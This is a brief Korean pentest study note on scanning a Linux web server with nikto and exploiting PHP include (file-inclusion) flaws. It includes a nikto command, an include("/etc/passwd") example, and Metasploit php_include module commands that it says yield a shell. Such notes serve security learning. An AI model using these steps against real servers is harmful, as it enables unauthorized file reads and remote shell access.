[모의해킹] 리눅스 웹서버 취약점 탐색 - nikto

/pentest/web/nikto/nikto.pl -h [서버주소] -p [포트]

Ex) /pentest/web/nikto.pl -h 192.168.7.136 -p 80

php include 취약점

php의  include() 함수는 지정경로의 파일을 포함한다.

만약 php소스가

include("/etc/passwd")

일 경우, /etc/passwd 의 내용을 참조한다

또한 이것은 꼭 파일의 경로에 한정된 것이 아닌, URL도 포함된다.

따라서 내 포트중 하나에 악의적인 PHP소스를 넣고 열어두어 희생자 PC에 내 소스를 참조하게 한다면,

공격은 성공한다.

use exploit/unix/webapp/php_include

set PHPURL [URL]/?hacker=www.naver.com

--> naver.com 을 참조. --> 네이버가 뜸

이런식으로, php_include 취약점을 활용하여 쉘을 얻을 수 있음.